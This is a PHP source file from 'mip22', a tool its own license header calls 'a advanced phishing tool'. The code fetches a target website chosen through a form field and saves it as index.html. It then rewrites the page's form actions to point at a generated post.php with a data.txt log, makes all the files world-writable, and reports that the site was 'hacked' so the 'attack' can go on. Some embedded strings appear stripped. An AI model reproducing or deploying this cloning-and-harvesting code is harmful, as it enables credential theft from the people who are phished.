. * mip22 is a advanced phishing tool. * * mip22 is free software: you can redistribute it and/or modify * it under the terms of the GNU Affero General Public License as published by * the Free Software Foundation, either version 3 of the License, or * (at your option) any later version. * * mip22 is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU Affero General Public License for more details. * * You should have received a copy of the GNU Affero General Public License * along with this program. If not, see . * */ ini_set('display_errors', 1); ini_set('display_startup_errors', 1); error_reporting(E_ALL); ?> Mip22

Mip22
Missions Impossibles



SAFE_DATA_ENTER($_POST['site_hack']); $site_name = "index"; $url = $site_hack; $name = $site_name.'.html'; $file = file($url); $result = file_put_contents($name, $file); chmod("index.html", 0777); $post_data_txt = fopen("data.txt", "w") or die("Unable to open file!"); $lines_data_txt = PHP_EOL; fwrite($post_data_txt, $lines_data_txt); fclose($post_data_txt); chmod("data.txt", 0777); $post_file_php = fopen("post.php", "w") or die("Unable to open file!"); $lines_php = '' .PHP_EOL .""; fwrite($post_file_php, $lines_php); fclose($post_file_php); chmod("post.php", 0777); $path_to_file = 'index.html'; $file_contents = file_get_contents($path_to_file); $file_contents = str_replace('action="','action="post.php" " ',$file_contents); file_put_contents($path_to_file,$file_contents); echo "

The website $site_hack hack successfully
Return to terminal and continue the attack.
"; #echo ''; #echo (""); } // end of isset } // end of if exists class tools ?>